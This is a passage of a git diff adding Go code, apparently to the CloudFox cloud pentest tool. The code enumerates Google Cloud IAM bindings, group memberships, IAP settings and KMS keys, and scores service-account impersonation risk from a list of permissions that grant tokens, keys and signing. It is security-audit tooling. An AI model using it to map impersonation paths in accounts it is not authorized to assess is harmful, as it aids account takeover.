group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + continue + } + // Preserve the roles from the original group + enrichedGroup.Roles = group.Roles + enrichedGroup.ProjectID = group.ProjectID + enrichedGroups = append(enrichedGroups, *enrichedGroup) + } + + return enrichedGroups +} + +// ExpandGroupPermissions expands permissions to include inherited permissions from group membership +// This creates permission entries for group members based on the group's permissions +func (s *IAMService) ExpandGroupPermissions(ctx context.Context, projectID string, entityPerms []EntityPermissions) ([]EntityPermissions, error) { + // Find all groups in the entity permissions + groupPermsMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + if entityPerms[i].EntityType == "Group" { + groupPermsMap[entityPerms[i].Entity] = &entityPerms[i] + } + } + + if len(groupPermsMap) == 0 { + return entityPerms, nil + } + + // Try to enumerate group memberships + var groupInfos []GroupInfo + for groupEmail := range groupPermsMap { + groupInfos = append(groupInfos, GroupInfo{Email: groupEmail, ProjectID: projectID}) + } + + enrichedGroups := s.GetGroupMemberships(ctx, groupInfos) + + // Create a map of member to their inherited permissions from groups + memberInheritedPerms := make(map[string][]PermissionEntry) + + for _, group := range enrichedGroups { + if !group.MembershipEnumerated { + continue + } + + groupPerms := groupPermsMap["group:"+group.Email] + if groupPerms == nil { + continue + } + + // For each member of the group, add the group's permissions as inherited + for _, member := range group.Members { + memberKey := "" + switch member.Type { + case "USER": + memberKey = "user:" + member.Email + case "SERVICE_ACCOUNT": + memberKey = "serviceAccount:" + member.Email + case "GROUP": + memberKey = "group:" + member.Email + } + + if memberKey == "" { + continue + } + + // Create inherited permission entries + for _, perm := range groupPerms.Permissions { + inheritedPerm := PermissionEntry{ + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceID: perm.ResourceID, + ResourceType: perm.ResourceType, + IsInherited: true, + InheritedFrom: fmt.Sprintf("group:%s", group.Email), + HasCondition: perm.HasCondition, + Condition: perm.Condition, + } + memberInheritedPerms[memberKey] = append(memberInheritedPerms[memberKey], inheritedPerm) + } + } + } + + // Add inherited permissions to existing entities or create new ones + entityMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + entityMap[entityPerms[i].Entity] = &entityPerms[i] + } + + for memberKey, inheritedPerms := range memberInheritedPerms { + if existing, ok := entityMap[memberKey]; ok { + // Add inherited permissions to existing entity + existing.Permissions = append(existing.Permissions, inheritedPerms...) + existing.TotalPerms = len(existing.Permissions) + // Recalculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range existing.Permissions { + uniquePerms[p.Permission] = true + } + existing.UniquePerms = len(uniquePerms) + } else { + // Create new entity entry for this group member + newEntity := EntityPermissions{ + Entity: memberKey, + EntityType: determinePrincipalType(memberKey), + Email: extractEmail(memberKey), + ProjectID: projectID, + Permissions: inheritedPerms, + Roles: []string{}, // Roles are inherited via group + TotalPerms: len(inheritedPerms), + } + // Calculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range inheritedPerms { + uniquePerms[p.Permission] = true + } + newEntity.UniquePerms = len(uniquePerms) + entityPerms = append(entityPerms, newEntity) + } + } + + return entityPerms, nil +} + +// GetAllEntityPermissionsWithGroupExpansion retrieves permissions with group membership expansion +func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) ([]EntityPermissions, []GroupInfo, error) { + ctx := context.Background() + + // Get base permissions + entityPerms, err := s.GetAllEntityPermissions(projectID) + if err != nil { + return nil, nil, err + } + + // Find groups + var groups []GroupInfo + for _, ep := range entityPerms { + if ep.EntityType == "Group" { + groups = append(groups, GroupInfo{ + Email: ep.Email, + ProjectID: projectID, + Roles: ep.Roles, + }) + } + } + + // Try to enumerate group memberships + enrichedGroups := s.GetGroupMemberships(ctx, groups) + + // Expand permissions based on group membership + expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not expand group permissions") + return entityPerms, enrichedGroups, nil + } + + return expandedPerms, enrichedGroups, nil +} + +// ============================================================================ +// PENTEST: Service Account Impersonation Analysis +// ============================================================================ + +// Dangerous permissions for SA impersonation/abuse +var saImpersonationPermissions = map[string]string{ + "iam.serviceAccounts.getAccessToken": "tokenCreator", + "iam.serviceAccountKeys.create": "keyCreator", + "iam.serviceAccounts.signBlob": "signBlob", + "iam.serviceAccounts.signJwt": "signJwt", + "iam.serviceAccounts.implicitDelegation": "implicitDelegation", + "iam.serviceAccounts.actAs": "actAs", +} + +// GetServiceAccountIAMPolicy gets the IAM policy for a specific service account +func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) + + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + info := &SAImpersonationInfo{ + ServiceAccount: saEmail, + ProjectID: projectID, + RiskReasons: []string{}, + } + + // Analyze each binding + for _, binding := range policy.Bindings { + role := binding.Role + members := binding.Members + + // Check for specific dangerous roles + switch role { + case "roles/iam.serviceAccountTokenCreator": + info.TokenCreators = append(info.TokenCreators, members...) + case "roles/iam.serviceAccountKeyAdmin": + info.KeyCreators = append(info.KeyCreators, members...) + info.SAAdmins = append(info.SAAdmins, members...) + case "roles/iam.serviceAccountAdmin": + info.SAAdmins = append(info.SAAdmins, members...) + info.TokenCreators = append(info.TokenCreators, members...) + info.KeyCreators = append(info.KeyCreators, members...) + case "roles/iam.serviceAccountUser": + info.ActAsUsers = append(info.ActAsUsers, members...) + case "roles/owner", "roles/editor": + // These grant broad SA access + info.SAAdmins = append(info.SAAdmins, members...) + } + } + + // Calculate risk level + info.RiskLevel, info.RiskReasons = calculateSAImpersonationRisk(info) + + return info, nil +} + +// GetAllServiceAccountImpersonation analyzes impersonation risks for all SAs in a project +func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { + ctx := context.Background() + + // Get all service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + var results []SAImpersonationInfo + + for _, sa := range serviceAccounts { + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but don't fail - we might not have permission + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for SA %s", sa.Email)) + continue + } + results = append(results, *info) + } + + return results, nil +} + +// ServiceAccountsWithImpersonation returns service accounts with impersonation analysis +func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + + // Get base service account info + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + // Enrich with impersonation info + for i := range serviceAccounts { + sa := &serviceAccounts[i] + + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but continue + continue + } + + // Populate impersonation fields + sa.CanGetAccessTokenBy = info.TokenCreators + sa.CanCreateKeysBy = info.KeyCreators + sa.CanSignBlobBy = info.SignBlobUsers + sa.CanSignJwtBy = info.SignJwtUsers + + // Combine all impersonation paths + allImpersonators := make(map[string]bool) + for _, m := range info.TokenCreators { + allImpersonators[m] = true + } + for _, m := range info.KeyCreators { + allImpersonators[m] = true + } + for _, m := range info.SignBlobUsers { + allImpersonators[m] = true + } + for _, m := range info.SignJwtUsers { + allImpersonators[m] = true + } + for _, m := range info.SAAdmins { + allImpersonators[m] = true + } + + for m := range allImpersonators { + sa.CanBeImpersonatedBy = append(sa.CanBeImpersonatedBy, m) + } + + sa.HasImpersonationRisk = len(sa.CanBeImpersonatedBy) > 0 + sa.ImpersonationRiskLevel = info.RiskLevel + } + + return serviceAccounts, nil +} + +func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) { + var reasons []string + score := 0 + + // Token creators are critical - direct impersonation + if len(info.TokenCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can get access tokens (impersonate)", len(info.TokenCreators))) + score += 3 + + // Check for public access + for _, m := range info.TokenCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can impersonate this SA!") + score += 5 + } + } + } + + // Key creators are critical - persistent access + if len(info.KeyCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can create keys (persistent access)", len(info.KeyCreators))) + score += 3 + + for _, m := range info.KeyCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can create keys for this SA!") + score += 5 + } + } + } + + // SignBlob/SignJwt - can forge tokens + if len(info.SignBlobUsers) > 0 || len(info.SignJwtUsers) > 0 { + reasons = append(reasons, "Principals can sign blobs/JWTs (token forgery)") + score += 2 + } + + // SA Admins + if len(info.SAAdmins) > 0 { + reasons = append(reasons, fmt.Sprintf("%d SA admin(s)", len(info.SAAdmins))) + score += 1 + } + + // ActAs users (needed for attaching SA to resources) + if len(info.ActAsUsers) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can actAs this SA", len(info.ActAsUsers))) + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// ============================================================================ +// Organization and Folder IAM Enumeration +// ============================================================================ + +// ScopeBinding represents an IAM binding with full scope information +type ScopeBinding struct { + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The ID of the scope + ScopeName string `json:"scopeName"` // Display name of the scope + Member string `json:"member"` // Full member identifier + MemberType string `json:"memberType"` // User, ServiceAccount, Group, etc. + MemberEmail string `json:"memberEmail"` // Clean email + Role string `json:"role"` + IsCustom bool `json:"isCustom"` + HasCondition bool `json:"hasCondition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` +} + +// OrgFolderIAMData holds IAM bindings from organizations and folders +type OrgFolderIAMData struct { + Organizations []ScopeBinding `json:"organizations"` + Folders []ScopeBinding `json:"folders"` + OrgNames map[string]string `json:"orgNames"` // orgID -> displayName + FolderNames map[string]string `json:"folderNames"` // folderID -> displayName +} + +// GetOrganizationIAM gets IAM bindings for all accessible organizations +func (s *IAMService) GetOrganizationIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + orgNames := make(map[string]string) + + // First, search for accessible organizations + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for organization search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "organization", + ScopeID: orgID, + ScopeName: org.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, orgNames, nil +} + +// GetFolderIAM gets IAM bindings for all accessible folders +func (s *IAMService) GetFolderIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + folderNames := make(map[string]string) + + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Search for all folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for folder search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "folder", + ScopeID: folderID, + ScopeName: folder.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, folderNames, nil +} + +// GetAllScopeIAM gets IAM bindings from organizations, folders, and projects +func (s *IAMService) GetAllScopeIAM(ctx context.Context, projectIDs []string, projectNames map[string]string) ([]ScopeBinding, error) { + var allBindings []ScopeBinding + + // Get organization IAM + orgBindings, _, err := s.GetOrganizationIAM(ctx) + if err != nil { + // Log but continue - we might not have org access + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate organization IAM") + } else { + allBindings = append(allBindings, orgBindings...) + } + + // Get folder IAM + folderBindings, _, err := s.GetFolderIAM(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate folder IAM") + } else { + allBindings = append(allBindings, folderBindings...) + } + + // Get project IAM for each project + for _, projectID := range projectIDs { + projectBindings, err := s.Policies(projectID, "project") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM for project %s", projectID)) + continue + } + + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + for _, pb := range projectBindings { + for _, member := range pb.Members { + sb := ScopeBinding{ + ScopeType: "project", + ScopeID: projectID, + ScopeName: projectName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: pb.Role, + IsCustom: isCustomRole(pb.Role), + } + if pb.HasCondition && pb.ConditionInfo != nil { + sb.HasCondition = true + sb.ConditionInfo = pb.ConditionInfo + } + allBindings = append(allBindings, sb) + } + } + } + + return allBindings, nil +} + +// ============================================================================ +// MFA Status Lookup via Cloud Identity API +// ============================================================================ + +// MFAStatus represents the MFA status for a user +type MFAStatus struct { + Email string `json:"email"` + HasMFA bool `json:"hasMfa"` + MFAType string `json:"mfaType"` // 2SV method type + Enrolled bool `json:"enrolled"` // Whether 2SV is enrolled + Enforced bool `json:"enforced"` // Whether 2SV is enforced by policy + LastUpdate string `json:"lastUpdate"` + Error string `json:"error"` // Error message if lookup failed +} + +// GetUserMFAStatus attempts to get MFA status for a user via Cloud Identity API +// This requires cloudidentity.users.get or admin.directory.users.get permission +func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFAStatus, error) { + status := &MFAStatus{ + Email: email, + } + + // Cloud Identity doesn't directly expose 2SV status + // We need to use the Admin SDK Directory API which requires admin privileges + // For now, we'll attempt to look up the user and note if we can't + + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + status.Error = "Cloud Identity API not accessible" + return status, nil + } + + // Try to look up the user - this gives us some info but not 2SV status directly + // The Admin SDK would be needed for full 2SV info + lookupReq := ciService.Groups.Lookup() + // We can't directly query user 2SV via Cloud Identity + // This would require Admin SDK with admin.directory.users.get + _ = lookupReq + + status.Error = "2SV status requires Admin SDK access" + return status, nil +} + +// GetBulkMFAStatus attempts to get MFA status for multiple users +// Returns a map of email -> MFAStatus +func (s *IAMService) GetBulkMFAStatus(ctx context.Context, emails []string) map[string]*MFAStatus { + results := make(map[string]*MFAStatus) + + for _, email := range emails { + // Skip non-user emails (service accounts, groups, etc.) + if strings.HasSuffix(email, ".iam.gserviceaccount.com") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A (service account)", + } + continue + } + if strings.Contains(email, "group") || !strings.Contains(email, "@") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A", + } + continue + } + + status, _ := s.GetUserMFAStatus(ctx, email) + results[email] = status + } + + return results +} + +// ============================================================================ +// Enhanced Combined IAM with All Scopes +// ============================================================================ + +// EnhancedIAMData holds comprehensive IAM data including org/folder bindings +type EnhancedIAMData struct { + ScopeBindings []ScopeBinding `json:"scopeBindings"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + MFAStatus map[string]*MFAStatus `json:"mfaStatus"` +} + +// CombinedIAMEnhanced retrieves all IAM-related data including org/folder bindings +func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []string, projectNames map[string]string) (EnhancedIAMData, error) { + var data EnhancedIAMData + data.MFAStatus = make(map[string]*MFAStatus) + + // Get all scope bindings (org, folder, project) + scopeBindings, err := s.GetAllScopeIAM(ctx, projectIDs, projectNames) + if err != nil { + return data, fmt.Errorf("failed to get scope bindings: %v", err) + } + data.ScopeBindings = scopeBindings + + // Collect unique user emails for MFA lookup + userEmails := make(map[string]bool) + for _, sb := range scopeBindings { + if sb.MemberType == "User" { + userEmails[sb.MemberEmail] = true + } + } + + // Get MFA status for users (best effort) + var emailList []string + for email := range userEmails { + emailList = append(emailList, email) + } + data.MFAStatus = s.GetBulkMFAStatus(ctx, emailList) + + // Get service accounts and custom roles for each project + for _, projectID := range projectIDs { + // Service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err == nil { + data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) + } + + // Custom roles + customRoles, err := s.CustomRoles(projectID) + if err == nil { + data.CustomRoles = append(data.CustomRoles, customRoles...) + } + } + + // Extract groups from scope bindings + groupMap := make(map[string]*GroupInfo) + for _, sb := range scopeBindings { + if sb.MemberType == "Group" { + if _, exists := groupMap[sb.MemberEmail]; !exists { + groupMap[sb.MemberEmail] = &GroupInfo{ + Email: sb.MemberEmail, + ProjectID: sb.ScopeID, // Use first scope where seen + Roles: []string{}, + } + } + groupMap[sb.MemberEmail].Roles = append(groupMap[sb.MemberEmail].Roles, sb.Role) + } + } + for _, g := range groupMap { + data.Groups = append(data.Groups, *g) + } + + return data, nil +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go new file mode 100644 index 00000000..e235cb94 --- /dev/null +++ b/gcp/services/iapService/iapService.go @@ -0,0 +1,172 @@ +package iapservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iap "google.golang.org/api/iap/v1" +) + +type IAPService struct { + session *gcpinternal.SafeSession +} + +func New() *IAPService { + return &IAPService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *IAPService { + return &IAPService{session: session} +} + +// IAPSettingsInfo represents IAP settings for a resource +type IAPSettingsInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + ResourceType string `json:"resourceType"` // compute, app-engine, etc. + ResourceName string `json:"resourceName"` + IAPEnabled bool `json:"iapEnabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + OAuth2ClientSecretSha string `json:"oauth2ClientSecretSha"` + AccessDeniedPageURI string `json:"accessDeniedPageUri"` + CORSAllowedOrigins []string `json:"corsAllowedOrigins"` + GCIPTenantIDs []string `json:"gcipTenantIds"` + ReauthPolicy string `json:"reauthPolicy"` +} + +// TunnelDestGroup represents an IAP tunnel destination group +type TunnelDestGroup struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListTunnelDestGroups retrieves tunnel destination groups +func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + var groups []TunnelDestGroup + + // List across common regions + regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "-"} + + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) + resp, err := service.Projects.IapTunnel.Locations.DestGroups.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, group := range resp.TunnelDestGroups { + info := TunnelDestGroup{ + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, + } + + // Fetch IAM bindings for this tunnel dest group + info.IAMBindings = s.getTunnelDestGroupIAMBindings(service, group.Name) + + groups = append(groups, info) + } + } + + return groups, nil +} + +// getTunnelDestGroupIAMBindings retrieves IAM bindings for a tunnel destination group +func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.V1.GetIamPolicy(resourceName, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// GetIAPSettings retrieves IAP settings for a resource +func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + info := &IAPSettingsInfo{ + Name: settings.Name, + ProjectID: projectID, + ResourceName: resourcePath, + } + + if settings.AccessSettings != nil { + if settings.AccessSettings.OauthSettings != nil { + info.OAuth2ClientID = settings.AccessSettings.OauthSettings.LoginHint + } + // CorsSettings doesn't have AllowHttpOptions as a list - it's a bool + // Skip CORS parsing for now + if settings.AccessSettings.GcipSettings != nil { + info.GCIPTenantIDs = settings.AccessSettings.GcipSettings.TenantIds + } + if settings.AccessSettings.ReauthSettings != nil { + info.ReauthPolicy = settings.AccessSettings.ReauthSettings.Method + } + } + + return info, nil +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go new file mode 100644 index 00000000..097dd801 --- /dev/null +++ b/gcp/services/kmsService/kmsService.go @@ -0,0 +1,279 @@ +package kmsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + kms "google.golang.org/api/cloudkms/v1" +) + +type KMSService struct{} + +func New() *KMSService { + return &KMSService{} +} + +// KeyRingInfo holds KMS key ring details +type KeyRingInfo struct { + Name string + ProjectID string + Location string + CreateTime string + + // Keys in this key ring + KeyCount int +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// CryptoKeyInfo holds KMS crypto key details with security-relevant information +type CryptoKeyInfo struct { + Name string + ProjectID string + Location string + KeyRing string + Purpose string // ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC + CreateTime string + + // Version info + PrimaryVersion string + PrimaryState string + VersionCount int + + // Security configuration + RotationPeriod string + NextRotationTime string + DestroyScheduledDuration string + ProtectionLevel string // SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC + + // Import info (indicates external key import) + ImportOnly bool + + // Labels + Labels map[string]string + + // IAM + IAMBindings []IAMBinding + IsPublicEncrypt bool + IsPublicDecrypt bool +} + +// KeyRings retrieves all KMS key rings in a project +func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keyRings []KeyRingInfo + + // List key rings across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.KeyRings.List(parent) + err = call.Pages(ctx, func(page *kms.ListKeyRingsResponse) error { + for _, kr := range page.KeyRings { + info := parseKeyRingInfo(kr, projectID) + + // Get key count for this key ring + keyCount, _ := ks.getKeyCount(service, kr.Name) + info.KeyCount = keyCount + + keyRings = append(keyRings, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + return keyRings, nil +} + +// CryptoKeys retrieves all crypto keys in a project +func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keys []CryptoKeyInfo + + // First get all key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + return nil, err + } + + // Then get keys from each key ring + for _, kr := range keyRings { + keyRingName := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name) + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err = call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + for _, key := range page.CryptoKeys { + info := parseCryptoKeyInfo(key, projectID, kr.Location, kr.Name) + + // Try to get IAM policy + iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) + } + + keys = append(keys, info) + } + return nil + }) + + if err != nil { + // Continue with other key rings even if one fails + continue + } + } + + return keys, nil +} + +// parseKeyRingInfo extracts relevant information from a KMS key ring +func parseKeyRingInfo(kr *kms.KeyRing, projectID string) KeyRingInfo { + info := KeyRingInfo{ + Name: extractName(kr.Name), + ProjectID: projectID, + CreateTime: kr.CreateTime, + } + + // Extract location from key ring name + // Format: projects/{project}/locations/{location}/keyRings/{keyRing} + parts := strings.Split(kr.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + return info +} + +// parseCryptoKeyInfo extracts relevant information from a KMS crypto key +func parseCryptoKeyInfo(key *kms.CryptoKey, projectID, location, keyRing string) CryptoKeyInfo { + info := CryptoKeyInfo{ + Name: extractName(key.Name), + ProjectID: projectID, + Location: location, + KeyRing: keyRing, + Purpose: key.Purpose, + CreateTime: key.CreateTime, + Labels: key.Labels, + ImportOnly: key.ImportOnly, + } + + // Rotation configuration + if key.RotationPeriod != "" { + info.RotationPeriod = key.RotationPeriod + } + if key.NextRotationTime != "" { + info.NextRotationTime = key.NextRotationTime + } + + // Destroy scheduled duration + if key.DestroyScheduledDuration != "" { + info.DestroyScheduledDuration = key.DestroyScheduledDuration + } + + // Primary version info + if key.Primary != nil { + info.PrimaryVersion = extractVersionNumber(key.Primary.Name) + info.PrimaryState = key.Primary.State + info.ProtectionLevel = key.Primary.ProtectionLevel + } + + // Version template for protection level + if info.ProtectionLevel == "" && key.VersionTemplate != nil { + info.ProtectionLevel = key.VersionTemplate.ProtectionLevel + } + + return info +} + +// getKeyCount gets the number of crypto keys in a key ring +func (ks *KMSService) getKeyCount(service *kms.Service, keyRingName string) (int, error) { + ctx := context.Background() + count := 0 + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err := call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + count += len(page.CryptoKeys) + return nil + }) + + if err != nil { + return 0, err + } + + return count, nil +} + +// getKeyIAMPolicy retrieves the IAM policy for a crypto key +func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*kms.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(keyName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseKeyBindings extracts all IAM 